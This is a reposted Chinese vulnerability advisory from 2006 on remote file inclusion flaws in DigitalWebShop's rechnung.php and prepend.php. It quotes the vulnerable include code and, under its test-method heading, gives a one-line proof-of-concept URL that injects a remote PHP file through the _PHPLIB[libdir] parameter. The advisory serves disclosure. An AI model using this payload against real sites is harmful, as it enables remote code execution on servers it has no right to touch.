[转载]DigitalWebShop多个远程文件包含漏洞

信息来源：绿盟科技

DigitalWebShop多个远程文件包含漏洞

发布日期：2006-09-15
更新日期：2006-09-21

受影响系统：
DigitalWebShop DigitalWebShop 1.128
DigitalWebShop DigitalWebShop 1.120
DigitalWebShop DigitalWebShop 1.110
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 20107

DigitalWebShop是一个内嵌的PHP脚本，可以使用图形相册和描述设计在线产品目录。

DigitalWebShop的rechnung.php和prepend.php文件没有正确地验证_PHPLIB[libdir]参数的输入，允许攻击者通过包含本地和外部资源的任意文件执行任意PHP代码。

漏洞代码如下：

....
require_once($_PHPLIB["libdir"] . "phpDB-mysql.lib");             /*
Mysql Class*/
require_once($_PHPLIB["libdir"] . "messages_inc.php");            /*
Layout f?r Echos & Prints. */
....

成功攻击要求打开了register_globals。

<*来源：ajann
  
  链接：http://secunia.com/advisories/22026/
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://target.com/rechnung.php?_PHPLIB[libdir]=http://target.com/command.php?

建议：
--------------------------------------------------------------------------------
厂商补丁：

DigitalWebShop
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://digitalwebshop.dyndns.org/phpBB2/index.php